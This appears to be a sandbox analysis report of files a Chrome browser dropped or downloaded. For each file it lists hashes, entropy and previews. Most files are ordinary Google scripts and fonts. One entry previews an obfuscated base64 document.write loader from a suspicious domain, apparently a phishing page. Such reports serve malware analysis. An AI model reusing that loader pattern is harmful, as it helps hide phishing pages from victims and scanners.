                                                                                                                    MD5:39D44458F0EEDB1EB876508C69E342F2
                                                                                                                    SHA1:68F5BC22058B43D55A4E755DFEEE9E9CE824F593
                                                                                                                    SHA-256:48A34C286471F85AF9ED18419DD97073015F72E90206D70AEDD4402C2EC1719D
                                                                                                                    SHA-512:25C965401DC9C551848A5F7884FB5404AFEE779757FF1B6621A5365F29BDDD9AED30B9AD28F072E2D764DBD31FA30AC32E6C7229D847E2A84B3A8F062409351F
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    URL:"https://fonts.googleapis.com/css?family=Google+Sans:400,500|Roboto:300,400,500,700|Source+Code+Pro:400,700&display=swap"
                                                                                                                    Preview:/*. * See: https://fonts.google.com/license/googlerestricted. */./* armenian */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/googlesans/v62/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPiIUvaYr.woff2) format('woff2');. unicode-range: U+0308, U+0530-058F, U+2010, U+2024, U+25CC, U+FB13-FB17;.}./* bengali */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/googlesans/v62/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPiAUvaYr.woff2) format('woff2');. unicode-range: U+0951-0952, U+0964-0965, U+0980-09FE, U+1CD0, U+1CD2, U+1CD5-1CD6, U+1CD8, U+1CE1, U+1CEA, U+1CED, U+1CF2, U+1CF5-1CF7, U+200C-200D, U+20B9, U+25CC, U+A8F1;.}./* canadian-aboriginal */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (1283)
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):4470
                                                                                                                    Entropy (8bit):5.3814102326751785
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:wNriNfnwizwTA39aygEAz3sOCIWzTwlrJx:XVwTA35U3Bb
                                                                                                                    MD5:F29B73DEB7FD9236E7EEDA53DB230463
                                                                                                                    SHA1:496BD1C3E40265208EB207BD2E5ADBCD34D19CB4
                                                                                                                    SHA-256:CF173442A6A3374EE4A072A07D0758D1B7B1D292FE51426279FC9873B3FA77BC
                                                                                                                    SHA-512:96670C5B7BB97174204EF4839DB71AAC1E9B55953AF9D8F0DCB1F3B97F7D9B86CC21C69D8C5611E15F9D27F02DB0B3B1A0FFAA3DCF78D18250DF10D05332329E
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:"use strict";this.default_vw=this.default_vw||{};(function(_){var window=this;.try{.var fLa;_.SA=function(a,c,e){return _.cla(document,arguments)};fLa=function(){var a=[];_.td(eLa,function(c,e){a.push(_.jl(e),":",c,";")});return a.join("")};_.TA=function(a,c,e,f){this.D=a;this.F=c;this.C=e||null;this.B=f?f:[];for(a=0;a<this.B.length;a=a+1|0)if(this.B[a].B.length>0)throw _.qra().Ob;};_.F(_.TA,_.or);_.TA.prototype.Sb=function(){return this.D};_.TA.prototype.getType=function(){return this.F};_.TA.prototype.nk=function(){return this.C};_.UA=function(){this.B=!1;this.V=!0};_.F(_.UA,_.xs);_.UA.prototype.isEnabled=function(){return this.V};_.UA.prototype.Ua=function(a){this.V=a};_.UA.prototype.BG=function(a,c){this.isEnabled()&&this.WO(a,c!=null?_.Or(c):0)};_.UA.prototype.speak=function(a,c){var e=this.BG;a=new _.TA(a,0,null,null);e.call(this,a,c)};var gLa={" ":"space","`":"backtick","~":"tilde","!":"exclamation mark","@":"at","#":"pound",$:"dollar","%":"percent","^":"caret","&":"ampersand","
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1136)
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1555
                                                                                                                    Entropy (8bit):5.249530958699059
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:hY6svN/6zSU6pedQf3Zvcn1BZdAe1nCr1LTHI5z1sW:3qN/2+pUAew85zf
                                                                                                                    MD5:FBE36EB2EECF1B90451A3A72701E49D2
                                                                                                                    SHA1:AE56EA57C52D1153CEC33CEF91CF935D2D3AF14D
                                                                                                                    SHA-256:E8F2DED5D74C0EE5F427A20B6715E65BC79ED5C4FC67FB00D89005515C8EFE63
                                                                                                                    SHA-512:7B1FD6CF34C26AF2436AF61A1DE16C9DBFB4C43579A9499F4852A7848F873BAC15BEEEA6124CF17F46A9F5DD632162364E0EC120ACA5F65E7C5615FF178A248F
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:<!DOCTYPE html>.<html lang=en>. <meta charset=utf-8>. <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">. <title>Error 400 (Bad Request)!!1</title>. <style>. *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//ww
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (2049)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):14469
                                                                                                                    Entropy (8bit):5.472997784863054
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:IYim7O/sAg9U6KAQdkzFu+5aiWQLHO91cIuW:IoqUAh8vzLW2y
                                                                                                                    MD5:F447D1B8B0211DD89ABAF4E43D2D1FFE
                                                                                                                    SHA1:53B9C5F73A3F9E2C59293037469F3C69F317454F
                                                                                                                    SHA-256:AE2328B23CA6A7F6C2FDAAF7EC080B674AC1C95DA79378DAB2D15DFA3CBDF550
                                                                                                                    SHA-512:16DAB239929B5C02C0A34640237ED4E91C66F581A52B54B671D807EC894891C8F8FE3FCF1EB54C6EFA1EF0AE136B136B68855AEC931877A47CFFD3D4D663FE67
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    URL:https://apis.google.com/js/client.js?onload=gapiLoaded
                                                                                                                    Preview:(function(){var aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ba=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");},ca=ba(this),g=function(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-.1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&aa(c,a,{configurable:!0,writable:!0,value:b})}},h=function(a,b,c){if(a==null)throw new TypeError("The 'this' value for String.prototype."+c+" must not be null or undefined");if(b instanceof RegExp)throw new TypeError("First argument to String.prototype."+c+" must not be a regular expression");return a+""};.g("String.prototype.endsWith",function(a){return a?a:function(b,c){var d=h(this
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (1239)
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):129391
                                                                                                                    Entropy (8bit):5.658313993435465
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:cA3i0ALxQEyQ4mjIfjj+wcD9KeYy/KJZv58V5Vs6uZzIF4uenXlDYwFO4vUebzP6:NUsdqwUXUZv58V5Vs6+zhowpvT7C
                                                                                                                    MD5:BD27851B76DD704D42F3CE0CE7C79FD4
                                                                                                                    SHA1:D7D80893B7C2C82A8EFD5FF24D0A13BB70211A23
                                                                                                                    SHA-256:9106E31425E54823B8B82F600AC01F49963CB8F1DAE3EE3102DABE0D1BF7358D
                                                                                                                    SHA-512:BC563ACC94468B81029BFDC51AF3A7D96CD09108DA80FF5176F14D5B8A4618E90BF4419CE29DFBE1C17D7CA60CEFA3C4B598372008D0DB3A7B55516F69114C2B
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:"use strict";this.default_vw=this.default_vw||{};(function(_){var window=this;.try{._.x("MpJwZc");.._.z();.}catch(e){_._DumpException(e)}.try{._.x("n73qwf");.._.z();.}catch(e){_._DumpException(e)}.try{._.x("A4UTCb");.._.z();.}catch(e){_._DumpException(e)}.try{._.x("mzzZzc");.var YKa;_.MA=function(){_.Ll.call(this)};_.F(_.MA,_.Mn);_.MA.la=_.Mn.la;YKa=function(a){a=_.Je(a,function(c){return _.Ie(c)&&(c.id==="yDmH0d"||c.classList.contains("yDmH0d"))});return _.Ie(a)?a:null};_.NA=function(a){if(a){var c;return(c=YKa(a))!=null?c:_.Ke(a).body}a=document;var e;return(e=a.getElementById("yDmH0d"))!=null?e:a.body};_.ko(_.Zo,_.MA);._.z();.}catch(e){_._DumpException(e)}.try{._.x("CHCSlb");._.LA=function(){_.Ll.call(this)};_.F(_.LA,_.Mn);_.LA.la=_.Mn.la;_.ko(_.Yna,_.LA);._.z();.}catch(e){_._DumpException(e)}.try{._.x("qAKInc");._.U2=function(a){_.Qn.call(this,a.Na);this.B=this.getData("active").B(!1);this.C=this.S("vyyg5");this.F=_.wf(_.xf(this).Bc().cb(function(){var c=this.U();this.B?c.Sa("qs41q
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (1421)
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):31069
                                                                                                                    Entropy (8bit):5.40644905813247
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:rlUZqboYsiXSMAxIies8kpMvPN67qvqemLAIxg7QVq+oHQby9O7LXdL8R2fpVNTj:nWVq+oHQby9O7LtVfzcql
                                                                                                                    MD5:601C47FBB1B95A6B20385B3724C704F1
                                                                                                                    SHA1:64C214CF4A7DAA9714965CC6C5E7CABDBAFC2EE5
                                                                                                                    SHA-256:3B473F00F9698E221AF711B717852C10213A5BB8FB7D63A97A53AD2113845442
                                                                                                                    SHA-512:57409165DF26FD3F6E1082098A6E38BE96853876AFA40C2748CA131480095A654B1E9962B96536432EFDFCAF7B846FA18BF6934E4191A524A572EC493E3215BF
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:"use strict";this.default_vw=this.default_vw||{};(function(_){var window=this;.try{._.ZFb=function(a,c){c=c===void 0?window:c;c=c===void 0?window:c;return(c=c.WIZ_global_data)&&a in c?c[a]:null};.}catch(e){_._DumpException(e)}.try{._.x("IZT63");.var nWb=function(){var a=_.ZFb("nQyAE",window),c;if((c=_.ZFb("TSDtV",window))&&typeof c==="string"){var e=_.jj(_.lm(c,iWb),jWb,1,_.ej())[0];if(e){c={};e=_.jj(e,kWb,2,_.ej());e=_.r(e);for(var f=e.next();!f.done;f=e.next()){var g=f.value;f=_.K(g,7);switch(_.gj(g,p8)){case 3:c[f]=_.I(g,_.hj(g,p8,3));break;case 2:c[f]=_.xj(g,_.hj(g,p8,2));break;case 4:c[f]=_.mja(g,_.hj(g,p8,4));break;case 5:c[f]=_.K(g,_.hj(g,p8,5));break;case 8:switch(g=_.ij(g,lWb,_.hj(g,p8,8)),_.gj(g,mWb)){case 1:c[f]="%.@."+_.K(g,_.hj(g,.mWb,1)).substring(1)}}}}else c={}}else c={};if(c&&Object.keys(c).length>0)for(e=_.r(Object.keys(c)),f=e.next();!f.done;f=e.next())f=f.value,f in a||(a[f]=c[f]);return a},lWb=function(a){this.ca=_.w(a)};_.F(lWb,_.L);var mWb=[1];var kWb=function(a)
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:PNG image data, 3396 x 1920, 8-bit/color RGB, non-interlaced
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):87859
                                                                                                                    Entropy (8bit):7.046777034066421
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:k4iIwz9HmGeKV5FrZuUDPA3Ae3ItuR30nAVO4P88D6s:piIkGZ+ZsJ4YR30ePHD6s
                                                                                                                    MD5:A4D9107960AE4E4F79E6A36DF931EF5D
                                                                                                                    SHA1:35704C698FCCD795B8F19DA76672A72C00422857
                                                                                                                    SHA-256:FBBBC78E85DFA4F2B390E6DC2F3850D0F5247D16B5FD525093331572AA79AE84
                                                                                                                    SHA-512:2C7FB7F198B0B141DD5B2B72ECB8B6E00514B70DFDE8CF6161988A5BB4F26C72BEED5CB59EC9E80BB2651016999D7DBB1CEE73F18AF7A982A0F3AC73E9B02465
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:.PNG........IHDR...D.........3;+.....sBIT.....O...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(..........Y..)....O..h.-... .IDATx...!.. ..0..X..I.................@g............;3............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13............|..........3..........@............13..
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (1225)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):92926
                                                                                                                    Entropy (8bit):5.612434461064469
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:tj0pP0oOzTuBXc2ZEw8b58rKnV+r2xt431sko/P:tNoOzTuhcXwqArCP
                                                                                                                    MD5:48F3855E9F0307D289CBC9C2313BD1D8
                                                                                                                    SHA1:7EDDAAF230FE48F519C7A7EEBDFD53443D2CBB5E
                                                                                                                    SHA-256:7A62263CC1E9A35BDBB728B683670B4CDD0F8C6CC955F5760F5BF60A51FFCFAF
                                                                                                                    SHA-512:C7317185815F511D88FE857AA7272B60F469308E3BDF4FC79BA0A492742BB4E85F36576ACE969031A013505539B5E2FA3E3C1879F6B657D0500EFB8BB3E599DB
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    URL:"https://www.gstatic.com/_/atari/_/js/k=atari.vw.en_US.fw_mAcuwUyE.O/am=MBiA/d=0/rs=AGEqA5lwNXFYaHUUDGYHiMqlOO36DqQAOw/m=NTMZac,m9oV,sye,syj,Ae65rd,rCcCxc,RAnnUd,CuaHnc,sy10,sy3a,sy3c,gJzDyc,sy3m,uu7UOe,sy3n,soHxf,sy3o,uY3Nvd,mxS5xe,syx,syw,sy34,HYv29e"
                                                                                                                    Preview:"use strict";this.default_vw=this.default_vw||{};(function(_){var window=this;.try{._.x("NTMZac");.var D8=function(){_.Ll.call(this)};_.F(D8,_.Mn);D8.la=_.Mn.la;D8.prototype.Ml=function(){throw Error("ii");};D8.prototype.RF=function(){throw Error("ii");};D8.prototype.Nb=function(){throw Error("ii");};_.ko(_.Mta,D8);._.z();.}catch(e){_._DumpException(e)}.try{._.x("m9oV");._.P3=function(){_.Ll.call(this);this.enabled=!1};_.F(_.P3,_.Mn);_.P3.la=_.Mn.la;_.P3.prototype.Ua=function(a){this.enabled=a};_.P3.prototype.isEnabled=function(){return this.enabled};_.ko(_.eIa,_.P3);._.z();.}catch(e){_._DumpException(e)}.try{._.x("Ae65rd");.var AFb=_.qd("Ae65rd");var L1=function(a){_.Qn.call(this,a.Na);this.B=!1};_.F(L1,_.Qn);L1.la=_.Qn.la;_.k=L1.prototype;_.k.G3=function(){var a=this.S("haAclf").el();this.B=_.Im(a,"pointerEvents")==="none"};_.k.D3=function(a){var c=this.U(),e=this.S("haAclf").el();e=_.Im(e,"display")!=="none"&&a.targetElement.closest(".Znu9nd").el()===null;var f=this.B&&e&&!c.ab("CJI
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 18536, version 1.0
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):18536
                                                                                                                    Entropy (8bit):7.986571198050597
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:IhocXmE6eM871P7td/mcOKA454H2orQEONKrOqxw:f6WeL1P//9D54WCCKc
                                                                                                                    MD5:8EFF0B8045FD1959E117F85654AE7770
                                                                                                                    SHA1:227FEE13CEB7C410B5C0BB8000258B6643CB6255
                                                                                                                    SHA-256:89978E658E840B927DDDB5CB3A835C7D8526ECE79933BD9F3096B301FE1A8571
                                                                                                                    SHA-512:2E4FB65CAAB06F02E341E9BA4FB217D682338881DABA3518A0DF8DF724E0496E1AF613DB8E2F65B42B9E82703BA58916B5F5ABB68C807C78A88577030A6C2058
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    URL:https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu4mxK.woff2
                                                                                                                    Preview:wOF2......Hh..........H..............................Z..|.`..J.T..<.....H..U..Z...x.6.$..0. ..t. ..I....p.0.VU.......1....AQ...d..x.....R..4.-.c..C$fUc.c..IX..@..~g.xs.....%...O...eJ.w..U.|.......%*..{.......U+..T#.S......`.n.....V.w.4..~P"..zk.%..../........=3...F.........V.FL..;Bc.........A.Uk.U1.b!Y.BH.DL...s.s...F.m.9a..GJ..1..#.`*m5..DI..X5#.........B.Akm.....&..0...{.L.....G......-(.......O4.@3....=......f..l...$.....j..NO...e.Y.tJ2J>F.(.c....08..e...~....D2S7s:.G'Gm........!.7.........r.c.`,.....~.).......c>1.......Y.g2^...T-1.7./r./....>...g.ov@u.?.U.+._...'M..,.,g....!g..9."..yBF.#r+.Ps...%.d=....U...5.b.$:`.4R.II.<A....Q)....e...k.....M.8.z....+.....5}..F........F.d._...].~-](.Lf....Y..W....;-z...;. .@x._v../.%UIm....=s...P.C....G...^..Q.!g.!b._.P....at..?.}....t.z...O(..Y6..R.2.X....k.R..K.gw(.F.K?m..R*...7....dj..7. .r.U..be.4......8.].w.B..B......Y..:..8.N..U...NEm...\.^q..f}.......{..6.". ...y-.Y...N.*+.M E..`......R.$T
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:HTML document, ASCII text, with very long lines (31805), with CRLF line terminators
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):68298
                                                                                                                    Entropy (8bit):5.816184795462063
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:GdkIeeHj/ks9cxCXejIaX4Gls8Mpj9udkIeeHj/ks9cxCXejIaX4Gls8Mpj9KE5:Gdk90rcR/dk90rcRG
                                                                                                                    MD5:4D002B7B3BD9CDD2D8740C0C59315F8A
                                                                                                                    SHA1:274845616916AED5669F8743BD56CBD639817C1E
                                                                                                                    SHA-256:A9DE1A1004867E39C7F47974653510C05C2248B6E84F0B6A41161FBD6E833F92
                                                                                                                    SHA-512:0DC3A4D3E1C3AD93E864F794251A2C318F3C0711A5B708E1C58C4095821BEB7B9E5DF82A875175E8566A3545B236C941CE81412FCBEEF301839B0C7BAFA321B6
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    URL:https://j9.valcondunar.com/b3k54/
                                                                                                                    Preview:<script>../* Great leaders inspire action. */..if(atob("aHR0cHM6Ly9MR3BhLnZhbGNvbmR1bmFyLmNvbS9iM2s1NC8=") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1FZGdlLGNocm9tZT0xIj4NCiAgICA8bWV0YSBuYW1lPSJyb2JvdHMiIGNvbnRlbnQ9Im5vaW5kZXgsIG5vZm9sbG93Ij4NCiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCI+DQogICAgPHRpdGxlPiYjODIwMzs8L3RpdGxlPg0KPHN0eWxlPg0KYm9keSwgaHRtbCB7DQptYXJnaW46IDA7DQpwYWRkaW5nOiAwOw0KaGVpZ2h0OiAxMDAlOw0Kb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCg0KLmJhY2tncm91bmQtY29udGFpbmVyIHsNCiAgICBwb3NpdGlvbjogcmVsYXRpdmU7DQogICAgaGVpZ2h0OiAxMDAlOw0KICAgIHdpZHRoOiAxMDAlOw0KfQ0KLmJhY2tncm91bmQtY29udGFpbmVyOjpiZWZvcmUgew0KICAgIGNvbnRlbnQ6ICIiOw0KICAgIHBvc2l0aW9uOiBhYnNvbHV0ZTsNCiAgICB0b3A6IDA7DQogICAgbGVmdDogMDsNCi
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):16
                                                                                                                    Entropy (8bit):3.5
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:H+rYn:D
                                                                                                                    MD5:F1C9C44E663E7E62582E3F5B236C1C72
                                                                                                                    SHA1:E142F3A0C2D1CDF175A5C3AF43AD66FEFE208B1F
                                                                                                                    SHA-256:D843E67FBFA1F5CB0024062861EE26860C5A866F80755CF39B3465459A8538B9
                                                                                                                    SHA-512:19FE62CB9D884BB3424C51DD15E74EB22E5A639BABF8398BACEBB781862296FA0D7AEE39C88CB9C7AF5791FD58830AC3433F5C6BD94B1BA3912AB33151E93452
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAlxOFbuz0tUtBIFDTcwqTA=?alt=proto
                                                                                                                    Preview:CgkKBw03MKkwGgA=
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (1953)
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):38020
                                                                                                                    Entropy (8bit):5.63608450668924
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:KckTaQOQMB+JTl7vtnCQt2zWAaL7Lg3Qi16YxjqCW5InXPjwM:pQOTqTlVCQMzWl7MsWB
                                                                                                                    MD5:981999AE4E7A1B7534ED52AD7B437CA3
                                                                                                                    SHA1:5271CD98374EC3BF9FD8B09E6E53E1320D4B1B4C
                                                                                                                    SHA-256:24ECEB95A538E2CA25FECE065D4F518AC5AFDCF67F4550A3A962A635F2724A59
                                                                                                                    SHA-512:70273D218D62E78225FB77F500A1B3A68A63C96EED4DDAFE0536B9B71D27F4506BDDFB966840712323413F691DDC5638BFBC536D8B29A69BE3A3457C480D931A
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:"use strict";this.default_vw=this.default_vw||{};(function(_){var window=this;.try{._.JOa=function(a){for(var c=[],e=0,f=0;f<a.length;f++){var g=a.charCodeAt(f);g<128?c[e++]=g:(g<2048?c[e++]=g>>6|192:((g&64512)==55296&&f+1<a.length&&(a.charCodeAt(f+1)&64512)==56320?(g=65536+((g&1023)<<10)+(a.charCodeAt(++f)&1023),c[e++]=g>>18|240,c[e++]=g>>12&63|128):c[e++]=g>>12|224,c[e++]=g>>6&63|128),c[e++]=g&63|128)}return c};_.fC=function(a,c,e){return _.Co(_.Ho(a,c),c,e)};_.gC=function(){this.blockSize=-1};.}catch(e){_._DumpException(e)}.try{.var hC,iC,KOa,LOa,OOa,POa,jC,VOa,WOa,XOa,YOa,mC,ZOa,aPa,bPa,oC;hC=function(a,c){this.F=a;this.H=c;this.B=!0};iC=function(a){var c={};a=a.replace(/\r/g,"").split("\n");for(var e=0;e<a.length;e++){var f=a[e],g=f.indexOf(":");g<0||(c[f.substring(0,g)]=f.substring(g+2,f.length))}return c};KOa=function(a){var c="";_.td(a,function(e,f){c+=f+": "+e+"\r\n"});return c};LOa=function(){};_.MOa=function(){var a=new _.Pr;_.ur(a);_.wr(a,Error(a));return a};._.NOa=function
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (524)
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):682280
                                                                                                                    Entropy (8bit):5.549668900622937
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:iOa+LzokwOO56xt5DBlDF3toBPrE0XG8EpzKv8aIrtkvuLDPxlzPW872w2vbY:iOaTnA7BlDFX0XNpvKLDYY
                                                                                                                    MD5:12F310BB15EC7927981B4A8BC629A0B6
                                                                                                                    SHA1:DA7BB7694CDAAF0A86DB0F7D780039A29EB89DC7
                                                                                                                    SHA-256:50EC1065C8CF25CCEFF7240B871CD141C1097BEF4AB395F2BD5FCEE7CA3B2AC1
                                                                                                                    SHA-512:FD4317F5049D5441CB27B86FA5EC2216373A434A4A4E05B5BF4EF35B77E02F97674429CC656820E92A659CCDF49E4890FF0156A5244DF0D43A84303F9BE26C50
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:"use strict";this.default_vw=this.default_vw||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x801830, ]);./*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT.*/./*. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC All Rights Reserved... Use of this source code is governed by an MIT-style license that can be. found in the LICENSE file at https://angular.dev/license.*/./*.. Copyright 2017 Google LLC. SPDX-License-Identifier: BSD-3-Clause.*/./*.. Copyright 2019 Google Inc... Permission is hereby granted, free of charge, to any person obtaining a copy. of this software and associated documentation files (the "Software"), to deal. in the Software without restrictio
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (65447)
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):89501
                                                                                                                    Entropy (8bit):5.289893677458563
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                    MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                    SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                    SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                    SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (1817)
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):43641
                                                                                                                    Entropy (8bit):5.601106223240889
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:qgjicN0q3Ii7y8R2Pc/ZryZeWX7ieWnr5LDbzAuQosGdpKFAYp/kfDzZQp87J+LT:o42PEszQrJMo18mtfDNXi0s
                                                                                                                    MD5:01054A02B51F5F599A51D30081EF9ECB
                                                                                                                    SHA1:5E88096615EE2349ECA90A775DC925B1883B0BB1
